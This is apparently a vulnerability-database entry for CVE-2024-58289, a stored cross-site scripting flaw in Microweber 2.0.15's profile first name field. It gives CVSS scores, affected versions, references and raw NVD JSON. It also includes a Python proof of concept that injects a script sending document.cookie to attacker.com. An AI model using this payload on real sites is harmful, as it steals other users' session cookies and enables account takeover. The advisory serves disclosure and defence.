CVE-2024-58289

Description

Microweber 2.0.15 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into user profile fields. Attackers can input script payloads in the first name field that will execute when the profile is viewed by other users, potentially stealing session cookies and executing arbitrary JavaScript.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microweber:microweber:2.0.15:*:*:*:*:*:*:* - VULNERABLE

Microweber <= 2.0.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2024-58289: Microweber 2.0.15 Stored XSS PoC # Target: Microweber instance # Vulnerability: Stored XSS in user profile first name field TARGET_URL = "http://target-website.com" LOGIN_URL = f"{TARGET_URL}/api/user_login" PROFILE_URL = f"{TARGET_URL}/api/user_profile" # Malicious XSS payload XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def exploit(): # Step 1: Login with low-privilege account session = requests.Session() login_data = { "username": "attacker_username", "password": "attacker_password" } response = session.post(LOGIN_URL, json=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Inject XSS payload in first name field profile_data = { "first_name": XSS_PAYLOAD, "last_name": "Test User", "email": "[email protected]" } response = session.put(PROFILE_URL, json=profile_data) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload: {XSS_PAYLOAD}") print("[+] Payload will execute when any user views the profile") return True else: print("[-] Failed to inject payload") return False if __name__ == "__main__": exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58289
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58289
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58289/
[4] VulDB https://vuldb.com/cve/CVE-2024-58289
[5] https://github.com/microweber/microweber
[6] https://microweber.me/
[7] https://www.exploit-db.com/exploits/52058
[8] https://www.vulncheck.com/advisories/microweber-stored-cross-site-scripting-via-user-profile-fields

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58289", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:49.557", "lastModified": "2026-01-12T16:15:36.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microweber 2.0.15 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into user profile fields. Attackers can input script payloads in the first name field that will execute when the profile is viewed by other users, potentially stealing session cookies and executing arbitrary JavaScript."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microweber:microweber:2.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "010212D1-D982-4A54-9E43-99A710949DE2"}]}]}], "references": [{"url": "https://github.com/microweber/microweber", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://microweber.me/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/52058", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/microweber-stored-cross-site-scripting-via-user-profile-fields", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}